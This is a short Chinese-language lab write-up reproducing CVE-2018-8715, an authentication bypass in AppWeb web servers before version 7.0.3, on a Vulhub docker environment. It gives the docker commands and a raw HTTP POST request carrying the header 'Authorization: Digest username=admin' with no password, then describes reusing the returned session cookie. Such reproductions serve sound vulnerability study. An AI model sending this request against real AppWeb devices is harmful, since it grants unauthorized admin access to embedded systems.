AppWeb认证绕过漏洞（CVE-2018-8715）

前言
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写，能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。
漏洞描述
AppWeb其7.0.3之前的版本中，对于digest和form两种认证方式，如果用户传入的密码为null（也就是没有传递密码参数），appweb将因为一个逻辑错误导致直接认证成功，并返回session。
环境
Vulhub-docker
启动

cd vulhub-master/appweb/CVE-2018-8715
sudo docker-compose up -d #开启容器
sudo docker-compose down -v #关闭容器

输入admin（在知道用户名的情况下），不要输入密码，进行抓包。

添加字段：Authorization: Digest username=admin

POST / HTTP/1.1
Host: 192.168.159.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin

查看回显：找到set-cookie后面的字段

重新构造数据包

成功